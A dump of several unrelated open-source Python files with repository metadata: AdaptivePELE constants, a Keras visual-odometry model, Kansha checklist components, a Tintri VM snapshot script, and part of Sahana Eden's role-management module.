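#             'self': URLFor('author_detail', id='<id>'),
#             'collection': URLFor('author_list'),
#         })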
| mit | 1,358,582,022,125,161,700 | 27.475904 | 97 | 0.57986 | false |
AdaptivePELE/AdaptivePELE | AdaptivePELE/constants/constants.py | 1 | 7191 | from __future__ import absolute_import, division, print_function, unicode_literals
import os
import socket
machine = socket.getfqdn()
print("MACHINE", machine)
if "bsccv" in machine:
PELE_EXECUTABLE = "/data/EAPM/PELE/PELE++/bin/rev12360/Pele_rev12360_mpi"
DATA_FOLDER = "/data/EAPM/PELE/PELE++/data/rev12360/Data"
DOCUMENTS_FOLDER = "/data/EAPM/PELE/PELE++/Documents/rev12360"
PYTHON = "/data2/apps/PYTHON/2.7.5/bin/python2.7"
elif "mn.bsc" in machine:
PELE_EXECUTABLE = "/gpfs/projects/bsc72/PELE++/nord/V1.6/build/PELE-1.6_mpi"
DATA_FOLDER = "/gpfs/projects/bsc72/PELE++/nord/V1.6/Data"
DOCUMENTS_FOLDER = "/gpfs/projects/bsc72/PELE++/nord/V1.6/Documents"
PYTHON = "python"
elif "bsc.mn" in machine:
PELE_EXECUTABLE = "/gpfs/projects/bsc72/PELE++/mniv/V1.6/build/PELE-1.6_mpi"
DATA_FOLDER = "/gpfs/projects/bsc72/PELE++/mniv/V1.6/Data"
DOCUMENTS_FOLDER = "/gpfs/projects/bsc72/PELE++/mniv/V1.6/Documents"
elif "bullx" in machine:
    # these values are not correct for the MinoTauro hardware; they are just
    # left here as a placeholder
PELE_EXECUTABLE = "/gpfs/projects/bsc72/PELE++/nord/rev090518/bin/PELE-1.5_mpi"
DATA_FOLDER = "/gpfs/projects/bsc72/PELE++/nord/rev090518/Data"
DOCUMENTS_FOLDER = "/gpfs/projects/bsc72/PELE++/nord/rev090518/Documents"
elif machine == "bscls309":
PELE_EXECUTABLE = "/home/jgilaber/PELE-repo/bin/PELE-1.6_mpi"
DATA_FOLDER = "/home/jgilaber/PELE-repo/Data"
DOCUMENTS_FOLDER = "/home/jgilaber/PELE-repo/Documents"
else:
PELE_EXECUTABLE = None
DATA_FOLDER = None
DOCUMENTS_FOLDER = None
inputFileTemplate = "{ \"files\" : [ { \"path\" : \"%s\" } ] }"
trajectoryBasename = "*traj*"
class AmberTemplates:
forcefields = {"ff99SB": "oldff/leaprc.ff99SB", "ff14SB": "leaprc.protein.ff14SB"}
antechamberTemplate = "antechamber -i $LIGAND -fi pdb -o $OUTPUT -fo mol2 -c bcc -pf y -nc $CHARGE"
parmchk2Template = "parmchk2 -i $MOL2 -f mol2 -o $OUTPUT"
tleapTemplate = "source $FORCEFIELD\n" \
"source leaprc.gaff\n" \
"source leaprc.water.tip3p\n" \
"$MODIFIED_RES " \
"$LIGANDS " \
"$DUM " \
"$COFACTORS " \
"COMPLX = loadpdb $COMPLEX\n" \
"$BONDS " \
"addions COMPLX Cl- 0\n" \
"addions COMPLX Na+ 0\n" \
"solvatebox COMPLX TIP3PBOX $BOXSIZE\n" \
"saveamberparm COMPLX $PRMTOP $INPCRD\n" \
"savepdb COMPLX $SOLVATED_PDB\n" \
"quit"
DUM_atom = "DUM"
DUM_res = "DUM"
DUM_prep = " 0 0 0\n" \
"\n" \
"------%s--------------\n" \
"%s\n" \
"%s INT 0\n" \
"CHANGE OMIT DU BEG\n" \
" 0.0\n" \
" 1 DUMM DU M 0 -1 -2 0.000 0.000 0.000 0.000\n" \
" 2 DUMM DU M 1 0 -1 1.0000 0.0000 0.0000 0.000\n" \
" 3 DUMM DU M 2 1 0 1.0000 90.0000 0.0000 0.000\n" \
" 4 %s C E 0.00 0.00 0.00 0.00\n" \
"\n" \
"\n" \
"DONE\n" \
"STOP\n" \
"\n" % (DUM_res, DUM_res, DUM_res, DUM_atom)
DUM_cyl_prep = " 0 0 0\n" \
"\n" \
"------%s--------------\n" \
"%s\n" \
"%s INT 0\n" \
"CHANGE OMIT DU BEG\n" \
" 0.0\n" \
" 1 DUMM DU M 0 -1 -2 0.000 0.000 0.000 0.000\n" \
" 2 DUMM DU M 1 0 -1 1.0000 0.0000 0.0000 0.000\n" \
" 3 DUMM DU M 2 1 0 1.0000 90.0000 0.0000 0.000\n" \
" 4 %s C E 0.00 0.00 0.00 0.00\n" \
" 5 %s C E 0.00 0.00 0.00 0.00\n" \
" 6 %s C E 0.00 0.00 0.00 0.00\n" \
"\n" \
"\n" \
"DONE\n" \
"STOP\n" \
"\n" % (DUM_res, DUM_res, DUM_res, DUM_atom, DUM_atom+"B", DUM_atom+"T")
DUM_frcmod = "invented MM atom\n" \
"MASS\n" \
"%s 0.00 0.00\n" \
"\n" \
"NONB\n" \
" %s 0.00 0.00\n" % (DUM_atom, DUM_atom)
DUM_cyl_frcmod = "invented MM atom\n" \
"MASS\n" \
"%s 0.00 0.00\n" \
"%s 0.00 0.00\n" \
"%s 0.00 0.00\n" \
"\n" \
"NONB\n" \
" %s 0.00 0.00\n" \
" %s 0.00 0.00\n" \
" %s 0.00 0.00\n" % (DUM_atom, DUM_atom+"B", DUM_atom+"T", DUM_atom, DUM_atom+"B", DUM_atom+"T")
trajectoryTemplate = "trajectory_%d.%s"
CheckPointReporterTemplate = "checkpoint_%d.chk"
class OutputPathConstants():
"""
Class with constants that depend on the outputPath
"""
def __init__(self, outputPath):
self.originalControlFile = ""
self.epochOutputPathTempletized = ""
self.clusteringOutputDir = ""
self.clusteringOutputObject = ""
self.equilibrationDir = ""
self.tmpInitialStructuresTemplate = ""
self.tmpControlFilename = ""
self.tmpInitialStructuresEquilibrationTemplate = ""
self.tmpControlFilenameEqulibration = ""
self.topologies = ""
self.allTrajsPath = ""
self.MSMObjectEpoch = ""
self.buildConstants(outputPath)
def buildConstants(self, outputPath):
self.buildOutputPathConstants(outputPath)
self.tmpFolder = "tmp_" + outputPath.replace("/", "_")
self.buildTmpFolderConstants(self.tmpFolder)
def buildOutputPathConstants(self, outputPath):
self.originalControlFile = os.path.join(outputPath, "originalControlFile.conf")
self.epochOutputPathTempletized = os.path.join(outputPath, "%d")
self.clusteringOutputDir = os.path.join(self.epochOutputPathTempletized, "clustering")
self.clusteringOutputObject = os.path.join(self.clusteringOutputDir, "object.pkl")
self.MSMObjectEpoch = os.path.join(self.epochOutputPathTempletized, "MSM_object.pkl")
self.topologies = os.path.join(outputPath, "topologies")
self.equilibrationDir = os.path.join(outputPath, "equilibration")
self.allTrajsPath = os.path.join(outputPath, "allTrajs")
def buildTmpFolderConstants(self, tmpFolder):
self.tmpInitialStructuresTemplate = tmpFolder+"/initial_%d_%d.pdb"
self.tmpInitialStructuresEquilibrationTemplate = tmpFolder+"/initial_equilibration_%d.pdb"
self.tmpControlFilename = tmpFolder+"/controlFile%d.conf"
self.tmpControlFilenameEqulibration = tmpFolder+"/controlFile_equilibration_%d.conf"
md_supported_formats = set(["xtc", "dcd"])
formats_md_string = ", ".join(md_supported_formats)
| mit | -6,549,988,297,967,724,000 | 42.05988 | 129 | 0.522459 | false |
ksu-mechatronics-research/deep-visual-odometry | models/hand_crafted/alexnet_inspired/alexNet_14q/alexnet14.py | 1 | 2703 | # The Model of DeepVO
from keras.layers import Input
from keras.layers.core import Dense, Dropout, Activation, Flatten, Lambda
from keras.layers.convolutional import Convolution2D, MaxPooling2D
from keras.layers.normalization import BatchNormalization
from keras.models import Model
from keras.layers.advanced_activations import PReLU
from keras import backend as K #enable tensorflow functions
#AlexNet with batch normalization in Keras
#input image is 128x128
def create_model():
"""
This model is designed to take in images and give multiple outputs.
Here is what the network was designed for:
Inputs:
        128x128x6 RGB images stacked (RGBRGB)
Outputs:
Translation between two images
Rotation between images in quaternion form
"""
input_img = Input(shape=(128, 128, 6), name='input_img')
x = Convolution2D(96, 11, 11, border_mode='same')(input_img)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = MaxPooling2D(pool_size=(11, 11), strides=(5, 5), border_mode='same')(x)
x = Convolution2D(384, 3, 3, border_mode='same')(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = MaxPooling2D(pool_size=(3, 3), strides=(3, 3), border_mode='same')(x)
x = Flatten()(x)
x = Dense(4096, init='normal')(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = Dense(4096, init='normal')(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
# Delta Translation output
translation_proc = Dense(3, init='normal')(x)
    # PReLU is a parametric layer with trainable weights, so apply it directly
    # rather than wrapping it in Activation(), which would not register its
    # weights with the model
    vector_translation = PReLU(name='translation')(translation_proc)
# Delta rotation in quaternion form
rotation_proc = Dense(64, activation='relu')(x)
rotation_proc = Dense(64, activation='relu')(rotation_proc)
rotation_proc = Dense(64, activation='relu')(rotation_proc)
rotation_proc = Dense(4, activation='tanh')(rotation_proc)
quaternion_rotation = Lambda(normalize_quaternion, name='rotation')(rotation_proc)
model = Model(input=input_img, output=[vector_translation, quaternion_rotation])
return model
def normalize_quaternion(x):
"Use tensorflow normalize function on this layer to ensure valid quaternion rotation"
x = K.l2_normalize(x, axis=1)
return x
def train_model(model, Xtr, Ytr, Xte, Yte, save_path=None):
"Note: y should be [[translation],[quat rotation]]"
model.compile(loss='mean_squared_error', optimizer='adam', metrics=['mean_absolute_error'])
history = model.fit(Xtr, Ytr, validation_split=0.2, batch_size=8, nb_epoch=30, verbose=1)
score = model.evaluate(Xte, Yte, verbose=1)
if save_path:
model.save(save_path)
return score, history
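# A quick, hypothetical smoke test (not part of the original module); assumes
# a Keras 1.x environment matching the API used above.
if __name__ == "__main__":
    model = create_model()
    # Expect two named outputs: 'translation' and 'rotation'
    model.summary()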
| mit | -4,285,629,334,953,081,000 | 32.37037 | 95 | 0.691454 | false |
droodle/kansha | kansha/checklist/comp.py | 1 | 5840 | # --
# Copyright (c) 2012-2014 Net-ng.
# All rights reserved.
#
# This software is licensed under the BSD License, as described in
# the file LICENSE.txt, which you should have received as part of
# this distribution.
# --
from nagare import component, database, security
import json
from kansha.title import comp as title
from kansha import notifications
from models import DataChecklist, DataChecklistItem
class NewChecklistItem(object):
def __init__(self):
self.focus = False
class ChecklistTitle(title.Title):
model = DataChecklist
field_type = 'input'
class ChecklistItemTitle(title.Title):
model = DataChecklistItem
field_type = 'input'
class ChecklistItem(object):
def __init__(self, id_, data=None):
self.id = id_
data = data if data is not None else self.data
self.title = component.Component(ChecklistItemTitle(self))
self.title.on_answer(lambda v: self.title.call(model='edit' if not self.title.model else None))
self.done = data.done
@property
def data(self):
return DataChecklistItem.get(self.id)
def get_title(self):
return self.data.title
def set_title(self, title):
self.data.title = title
def set_done(self):
'''toggle done status'''
self.data.done = self.done = not self.done
item = self.data
data = {'item': self.get_title(),
'list': item.checklist.title,
'card': item.checklist.card.title}
notifications.add_history(item.checklist.card.column.board,
item.checklist.card,
security.get_user().data,
u'card_listitem_done' if self.done else u'card_listitem_undone',
data)
class Checklist(object):
def __init__(self, id_, data=None):
self.id = id_
data = data if data is not None else self.data
self.items = [component.Component(ChecklistItem(item.id, item)) for item in data.items]
self.title = component.Component(ChecklistTitle(self))
self.title.on_answer(self.handle_answer)
self.new_item = component.Component(NewChecklistItem())
self.new_item.on_answer(self.add_item)
def handle_answer(self, v):
if v and self.title.model:
self.new_title(v)
self.title.call(model='edit' if not self.title.model else None)
def edit_title(self):
self.title.becomes(model='edit')
def reorder_items(self):
for i, item in enumerate(self.data.items):
item.index = i
def add_item(self, text):
if text is None or not text.strip():
return
item = DataChecklistItem(checklist=self.data, title=text.strip(), index=len(self.data.items))
database.session.flush()
item = component.Component(ChecklistItem(item.id, item))
self.items.append(item)
self.reorder_items()
self.new_item().focus = True
def delete_item(self, index):
item = self.items.pop(index)()
item.data.delete()
self.reorder_items()
def get_title(self):
return self.data.title
def set_title(self, title):
self.data.title = title
def set_index(self, index):
self.data.index = index
@property
def total_items(self):
return len(self.items)
@property
def nb_items(self):
return len([item for item in self.items if item().done])
@property
def progress(self):
if not self.items:
return 0
return self.nb_items * 100 / self.total_items
@property
def data(self):
return DataChecklist.get(self.id)
def new_title(self, title):
cl = self.data
data = {'list': title, 'card': cl.card.title}
notifications.add_history(cl.card.column.board,
cl.card,
security.get_user().data,
u'card_add_list',
data)
class Checklists(object):
def __init__(self, card):
self.parent = card
self.checklists = [component.Component(Checklist(clist.id, clist)) for clist in card.data.checklists]
@property
def nb_items(self):
return sum([cl().nb_items for cl in self.checklists])
@property
def total_items(self):
return sum([cl().total_items for cl in self.checklists])
def delete_checklist(self, index):
cl = self.checklists.pop(index)()
for i in range(index, len(self.checklists)):
self.checklists[i]().set_index(i)
data = {'list': cl.get_title(), 'card': self.parent.get_title()}
cl.data.delete()
if data['list']:
notifications.add_history(self.parent.column.board.data,
self.parent.data,
security.get_user().data,
u'card_delete_list',
data)
def add_checklist(self):
clist = DataChecklist(card=self.parent.data)
database.session.flush()
ck = Checklist(clist.id, clist)
ck.edit_title()
ck.set_index(len(self.checklists))
self.checklists.append(component.Component(ck))
def reorder(self, ids):
"""Reorder checklists
In:
- ``ids`` -- checklist ids
"""
new_order = []
i = 0
for cl_id in json.loads(ids):
id_ = int(cl_id.split('_')[-1])
for cl in self.checklists:
if cl().id == id_:
cl().set_index(i)
i += 1
new_order.append(cl)
self.checklists = new_order
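# Illustrative ``reorder`` payload (hypothetical DOM ids): the client submits
# a JSON-encoded list whose items end in the checklist id, e.g.
#     checklists.reorder('["checklist_3", "checklist_1", "checklist_2"]')
# which re-indexes the checklist components to match the new visual order.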
| bsd-3-clause | -5,212,961,767,522,489,000 | 29.103093 | 109 | 0.568151 | false |
Tintri/tintri-api-examples | snapshot_vm.py | 1 | 5628 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# The MIT License (MIT)
#
# Copyright (c) 2016 Tintri, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import sys
import json
import datetime
import tintri_1_1 as tintri
"""
This Python script takes a snapshot for the specified VM.
"""
# For exhaustive messages on console, make it to True; otherwise keep it False
debug_mode = False
def print_with_prefix(prefix, out):
print(prefix + out)
return
def print_debug(out):
if debug_mode:
print_with_prefix("[DEBUG] : ", out)
return
def print_info(out):
print_with_prefix("[INFO] : ", out)
return
def print_error(out):
print_with_prefix("[ERROR] : ", out)
return
# Take a manual snapshot.
def take_snapshot(vm_uuid, snapshot_name, consistency_type, server_name, session_id):
snapshot_spec = {
'typeId' : "com.tintri.api.rest.v310.dto.domain.beans.snapshot.SnapshotSpec",
'consistency' : consistency_type,
'retentionMinutes' : 240, # 4 hours
'snapshotName' : snapshot_name,
'sourceVmTintriUUID' : vm_uuid }
# The API needs a list of snapshot specifications.
snapshot_specs = [snapshot_spec]
ss_url = "/v310/snapshot"
r = tintri.api_post(server_name, ss_url, snapshot_specs, session_id)
if (r.status_code != 200):
msg = "The HTTP response for the post invoke to the server is " + \
server_name + "not 200, but is: " + str(r.status_code) + "."
raise tintri.TintriApiException(msg, r.status_code, vm_url, str(snapshot_specs), r.text)
print_debug("The JSON response of the post invoke to the server " +
server_name + " is: " + r.text)
    # The result is a list of snapshot UUIDs.
snapshot_result = r.json()
print_info(snapshot_name + ": " + snapshot_result[0])
return
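# Example invocation (hypothetical host, credentials and VM name):
#     python snapshot_vm.py vmstore01.example.com admin s3cret MyVM vm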
# main
if len(sys.argv) < 5:
print("\nSnapshot a VM.\n")
print("Usage: " + sys.argv[0] + " server_name user_name password vm_name [consistency type]\n")
print(" consistency type can be 'crash' or 'vm'. The default is 'crash'.")
sys.exit(-1)
server_name = sys.argv[1]
user_name = sys.argv[2]
password = sys.argv[3]
vm_name = sys.argv[4]
if (len(sys.argv) == 6):
consistency_type = sys.argv[5]
else:
consistency_type = "crash"
try:
# Confirm the consistency type.
if (consistency_type == "crash"):
consistency_type = "CRASH_CONSISTENT"
elif (consistency_type == "vm"):
consistency_type = "VM_CONSISTENT"
else:
raise tintri.TintriRequestException("consistency_type is not 'crash' or 'vm': " + consistency_type)
# Get the preferred version
r = tintri.api_version(server_name)
json_info = r.json()
print_info("API Version: " + json_info['preferredVersion'])
# Login to VMstore or TGC
session_id = tintri.api_login(server_name, user_name, password)
except tintri.TintriRequestsException as tre:
print_error(tre.__str__())
sys.exit(-10)
except tintri.TintriApiException as tae:
print_error(tae.__str__())
sys.exit(-11)
try:
# Create query filter to get the VM specified by the VM name.
q_filter = {'name': vm_name}
# Get the UUID of the specified VM
vm_url = "/v310/vm"
r = tintri.api_get_query(server_name, vm_url, q_filter, session_id)
print_debug("The JSON response of the get invoke to the server " +
server_name + " is: " + r.text)
vm_paginated_result = r.json()
num_vms = int(vm_paginated_result["filteredTotal"])
if num_vms == 0:
raise tintri.TintriRequestsException("VM " + vm_name + " doesn't exist")
# Get the information from the first item and hopefully the only item.
items = vm_paginated_result["items"]
vm = items[0]
vm_name = vm["vmware"]["name"]
vm_uuid = vm["uuid"]["uuid"]
print_info(vm_name + ": " + vm_uuid)
# Get the time for the snapshot description.
now = datetime.datetime.now()
now_sec = datetime.datetime(now.year, now.month, now.day,
now.hour, now.minute, now.second)
snapshot_name = vm_name + now_sec.isoformat()
# Take a manual snapshot.
take_snapshot(vm_uuid, snapshot_name, consistency_type, server_name, session_id)
# All pau, log out.
tintri.api_logout(server_name, session_id)
except tintri.TintriRequestsException as tre:
print_error(tre.__str__())
tintri.api_logout(server_name, session_id)
sys.exit(-20)
except tintri.TintriApiException as tae:
print_error(tae.__str__())
tintri.api_logout(server_name, session_id)
sys.exit(-21)
| mit | -2,311,016,554,236,844,000 | 31.344828 | 107 | 0.663468 | false |
flavour/eden | modules/s3/s3roles.py | 1 | 73907 | # -*- coding: utf-8 -*-
""" S3 User Roles Management
@copyright: 2018-2019 (c) Sahana Software Foundation
@license: MIT
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
__all__ = ("S3RoleManager",
)
import uuid
import json
#import sys
from gluon import current, URL, DIV, SPAN, SQLFORM, INPUT, A, LI, UL
from s3compat import StringIO, long
from s3dal import Field
from .s3crud import S3CRUD
from .s3rest import S3Method
from .s3query import FS
from .s3utils import s3_str, s3_mark_required
from .s3validators import JSONERRORS
from .s3widgets import s3_comments_widget
from .s3xml import SEPARATORS
# =============================================================================
class S3RoleManager(S3Method):
""" REST Method to manage user roles and permission rules """
# -------------------------------------------------------------------------
def apply_method(self, r, **attr):
"""
Entry point for REST interface.
@param r: the S3Request instance
@param attr: controller attributes
"""
method = self.method
tablename = self.tablename
auth = current.auth
sr = auth.get_system_roles()
output = {}
if tablename == "auth_group": # through admin/role controller
# Only ADMIN can manipulate roles
if not auth.s3_has_role(sr.ADMIN):
r.unauthorised()
if method == "list":
output = self.role_list(r, **attr)
elif method in ("read", "create", "update"):
output = self.role_form(r, **attr)
elif method == "copy":
output = self.copy_role(r, **attr)
elif method == "delete":
output = self.delete_role(r, **attr)
elif method == "users":
output = self.assign_users(r, **attr)
elif method == "import":
output = self.import_roles(r, **attr)
else:
r.error(405, current.ERROR.BAD_METHOD)
elif tablename == "auth_user": # through admin/user controller
# Must have read-permission for the user record
# (user accounts are filtered to OU by controller)
if not self._permitted():
r.unauthorised()
if method == "roles":
output = self.assign_roles(r, **attr)
else:
r.error(405, current.ERROR.BAD_METHOD)
# TODO implement per-target perspective
#elif tablename == "s3_permission": # through admin/permissions controller
#
# # View permissions for a target (page or table)
# r.error(501, current.ERROR.NOT_IMPLEMENTED)
else:
r.error(401, current.ERROR.BAD_REQUEST)
return output
# -------------------------------------------------------------------------
def role_list(self, r, **attr):
"""
List or export roles
@param r: the S3Request instance
@param attr: controller attributes
NB this function must be restricted to ADMINs (in apply_method)
"""
# Check permission to read in this table
authorised = self._permitted()
if not authorised:
r.unauthorised()
# Validate requested format
representation = r.representation
if representation == "csv":
return self.export_roles(r, **attr)
T = current.T
response = current.response
s3 = response.s3
get_vars = self.request.get_vars
# List Config
list_id = "roles"
list_fields = ["id",
"role",
(T("UID"), "uuid"),
"description",
]
default_orderby = "auth_group.role"
s3.no_formats = True
# Exclude hidden roles
resource = self.resource
resource.add_filter(FS("hidden") == False)
if r.interactive:
# Formkey for Ajax-actions
formkey = str(uuid.uuid4())
current.session["_formkey[admin/rolelist]"] = formkey
# Pagination
display_length = s3.dataTable_pageLength or 25
start = None
if s3.no_sspag:
dt_pagination = "false"
limit = None
else:
dt_pagination = "true"
limit = 2 * display_length
# Generate Data Table
dt, totalrows = resource.datatable(fields = list_fields,
start = start,
limit = limit,
left = [],
orderby = default_orderby,
)
# Render the Data Table
datatable = dt.html(totalrows,
totalrows,
id = list_id,
dt_pagination = dt_pagination,
dt_pageLength = display_length,
dt_base_url = r.url(method="", vars={}),
dt_permalink = r.url(),
dt_formkey = formkey,
)
# Configure action buttons
self.role_list_actions(r)
# View
response.view = "admin/roles.html"
# Page actions
crud_button = S3CRUD.crud_button
page_actions = DIV(crud_button(T("Create Role"),
_href = r.url(method="create"),
),
# TODO activate when implemented
#crud_button(T("Import Roles"),
# _href = r.url(method="import"),
# ),
crud_button(T("Export Roles"),
_href = r.url(representation="csv"),
),
)
# Output
output = {"title": T("User Roles"),
"items": datatable,
"page_actions": page_actions,
}
elif representation == "aadata":
# Page limits
start, limit = S3CRUD._limits(get_vars)
# Data Table Filter and Sorting
searchq, orderby, left = resource.datatable_filter(list_fields,
get_vars,
)
if searchq is not None:
totalrows = resource.count()
resource.add_filter(searchq)
else:
totalrows = None
if orderby is None:
orderby = default_orderby
# Data Table
if totalrows != 0:
dt, displayrows = resource.datatable(fields = list_fields,
start = start,
limit = limit,
left = left,
orderby = orderby,
)
else:
dt, displayrows = None, 0
if totalrows is None:
totalrows = displayrows
# Echo
draw = int(get_vars.get("draw", 0))
# Representation
if dt is not None:
output = dt.json(totalrows, displayrows, list_id, draw)
else:
output = '{"recordsTotal":%s,' \
'"recordsFiltered":0,' \
'"dataTable_id":"%s",' \
'"draw":%s,' \
'"data":[]}' % (totalrows, list_id, draw)
else:
r.error(415, current.ERROR.BAD_FORMAT)
return output
# -------------------------------------------------------------------------
def role_list_actions(self, r):
"""
Configure action buttons for role list
@param r: the S3Request
"""
T = current.T
s3 = current.response.s3
sr = current.auth.get_system_roles()
table = self.table
# Standard actions
s3.actions = None
s3.crud_labels.UPDATE = T("Edit")
S3CRUD.action_buttons(r, editable=True, deletable=False)
action_button = S3CRUD.action_button
# Users
label = T("Users")
excluded = [str(sr.AUTHENTICATED), str(sr.ANONYMOUS)]
action_button(label, URL(args=["[id]", "users"]),
exclude = excluded,
_title = s3_str(T("Assign this role to users")),
)
action_button(label, None,
restrict = excluded,
_disabled = "disabled",
_title = s3_str(T("This role is assigned automatically")),
)
# Copy-button Ajax
label = T("Copy")
excluded = [str(sr.ADMIN)]
action_button(label, None,
_ajaxurl = URL(args=["[id]", "copy.json"]),
exclude = excluded,
_title = s3_str(T("Copy this role to create a new role")),
_class = "action-btn copy-role-btn",
)
action_button(label, None,
restrict = excluded,
_disabled = "disabled",
_title = s3_str(T("This role cannot be copied")),
)
question = T("Create a copy of this role?")
script = '''var dt=$('#roles');dt.on('click','.copy-role-btn',dt.dataTableS3('ajaxAction','%s'));''' % question
s3.jquery_ready.append(script)
# Delete-button Ajax
label = T("Delete")
query = (table.deleted == False) & \
((table.system == True) | (table.protected == True))
protected_roles = current.db(query).select(table.id)
excluded = [str(role.id) for role in protected_roles]
action_button(label, None,
_ajaxurl = URL(args=["[id]", "delete.json"]),
_class = "delete-btn-ajax action-btn dt-ajax-delete",
exclude = excluded,
)
action_button(label, None,
restrict = excluded,
_disabled = "disabled",
_title = s3_str(T("This role cannot be deleted")),
)
# -------------------------------------------------------------------------
def role_form(self, r, **attr):
"""
Create, read, update a role
NB this function must be restricted to ADMINs (in apply_method)
"""
T = current.T
s3 = current.response.s3
settings = current.deployment_settings
output = {}
method = r.method
record = r.record
# Read-only?
readonly = False
if r.record:
if r.interactive:
readonly = method == "read"
elif r.representation == "csv":
return self.export_roles(r, **attr)
else:
r.error(415, current.ERROR.BAD_FORMAT)
# Form fields
table = r.table
# UID
uid = table.uuid
uid.label = T("UID")
uid.readable = True
uid.writable = False if record and record.system else True
# Role name
role = table.role
role.label = T("Name")
# Role description
description = table.description
description.label = T("Description")
description.widget = s3_comments_widget
# Permissions
PERMISSIONS = T("Permissions")
permissions = Field("permissions",
label = PERMISSIONS,
widget = S3PermissionWidget(r.id),
)
if record and record.uuid == "ADMIN":
# Administrator permissions cannot be edited
permissions.readable = permissions.writable = False
elif not current.auth.permission.use_cacls:
# Security policy does not use configurable permissions
if record:
record.permissions = None
permissions.widget = self.policy_hint
elif readonly:
# Read-only view (dummy) - just hide permissions
permissions.readable = permissions.writable = False
elif record:
# Populate the field with current permissions
record.permissions = self.get_permissions(record)
# Mark required
if not readonly:
labels, s3.has_required = s3_mark_required(table, [])
labels["permissions"] = "%s:" % s3_str(PERMISSIONS)
else:
labels = None
# Form buttons
if not readonly:
submit_button = INPUT(_class = "small primary button",
_type = "submit",
_value = T("Save"),
)
cancel_button = A(T("Cancel"),
_class="cancel-form-btn action-lnk",
_href = r.url(id=""),
)
buttons = [submit_button, cancel_button]
else:
buttons = ["submit"]
# Form style
crudopts = s3.crud
formstyle = crudopts.formstyle_read if readonly else crudopts.formstyle
# Render form
tablename = "auth_group"
form = SQLFORM.factory(uid,
role,
description,
permissions,
record = record,
showid = False,
labels = labels,
formstyle = formstyle,
table_name = tablename,
upload = s3.download_url,
readonly = readonly,
separator = "",
submit_button = settings.submit_button,
buttons = buttons,
)
form.add_class("rm-form")
output["form"] = form
# Navigate-away confirmation
if crudopts.navigate_away_confirm:
s3.jquery_ready.append("S3EnableNavigateAwayConfirm()")
# Process form
response = current.response
formname = "%s/%s" % (tablename, record.id if record else None)
if form.accepts(current.request.post_vars,
current.session,
#onvalidation = self.validate,
formname = formname,
keepvalues = False,
hideerror = False,
):
role_id, message = self.update_role(record, form)
if role_id:
response.confirmation = message
self.next = r.url(id="", method="")
else:
response.error = message
elif form.errors:
response.error = T("There are errors in the form, please check your input")
# Title
if record:
if readonly:
output["title"] = record.role
else:
output["title"] = T("Edit Role: %(role)s") % {"role": record.role}
else:
output["title"] = T("Create Role")
# View
response.view = "admin/role_form.html"
return output
# -------------------------------------------------------------------------
@staticmethod
def policy_hint(field, value, **attr):
"""
Show a hint if permissions cannot be edited due to security policy
@param field: the Field instance
@param value: the current field value (ignored)
@param attr: DOM attributes for the widget (ignored)
"""
T = current.T
warn = T("The current system configuration uses hard-coded access rules (security policy %(policy)s).") % \
{"policy": current.deployment_settings.get_security_policy()}
hint = T("Change to security policy 3 or higher if you want to define permissions for roles.")
return DIV(SPAN(warn, _class="rm-fixed"),
SPAN(hint, _class="rm-hint"),
INPUT(_type = "hidden",
_name = field.name,
_value= "",
),
)
# -------------------------------------------------------------------------
@staticmethod
def get_permissions(role):
"""
Extract the permission rules for a role
@param role: the role (Row)
@returns: the permission rules as JSON string
"""
permissions = current.auth.permission
rules = []
table = permissions.table
if table:
query = (table.group_id == role.id) & \
(table.deleted == False)
if not permissions.use_facls:
query &= (table.function == None)
if not permissions.use_tacls:
query &= (table.tablename == None)
rows = current.db(query).select(table.id,
table.controller,
table.function,
table.tablename,
table.uacl,
table.oacl,
table.entity,
table.unrestricted,
)
for row in rows:
if row.unrestricted:
entity = "any"
else:
entity = row.entity
rules.append([row.id,
row.controller,
row.function,
row.tablename,
row.uacl,
row.oacl,
entity,
False, # delete-flag
])
return json.dumps(rules, separators=SEPARATORS)
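        # Illustrative payload produced above (values are hypothetical):
        #   [[42, "org", None, None, 7, 15, "any", False],
        #    [43, None, None, "org_organisation", 5, 7, None, False]]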
# -------------------------------------------------------------------------
def update_role(self, role, form):
"""
Create or update a role from a role form
@param role: the role (Row)
@param form: the form
@returns: tuple (role ID, confirmation message)
"""
T = current.T
auth = current.auth
formvars = form.vars
rolename = formvars.role
uid = formvars.uuid
if role:
role_id = role.id
data = {"role": rolename,
"description": formvars.description,
}
if uid is not None:
data["uuid"] = uid
role.update_record(**data)
else:
